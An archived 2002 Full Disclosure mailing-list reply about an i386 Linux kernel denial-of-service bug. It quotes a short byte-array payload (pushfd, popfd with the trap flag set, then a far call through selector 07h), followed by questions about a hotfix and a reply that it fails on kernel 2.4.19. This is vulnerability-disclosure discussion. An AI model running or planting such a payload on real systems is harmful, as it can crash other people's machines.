Full Disclosure mailing list archives

Re: Re: i386 Linux kernel DoS


From: Georgi Guninski <guninski () guninski com>
Date: Wed, 13 Nov 2002 20:16:50 +0200

Jim Paris wrote:

>    char dos[] = "\x9C"                           /* pushfd       */
>                 "\x58"                           /* pop eax      */
>                 "\x0D\x00\x01\x00\x00"           /* or eax,100h  */
>                 "\x50"                           /* push eax     */
>                 "\x9D"                           /* popfd        */
>                 "\x9A\x00\x00\x00\x00\x07\x00";  /* call 07h:00h */


Has anyone come up with a hotfix for this (eg, a kernel module to
temporarily patch the hole)?  Where was this bug fixed in 2.4.19?  The
CHECK_IF_IN_TRAP stuff in handle_vm86_fault?

-jim
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


This does not work on 2.4.19 for me.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: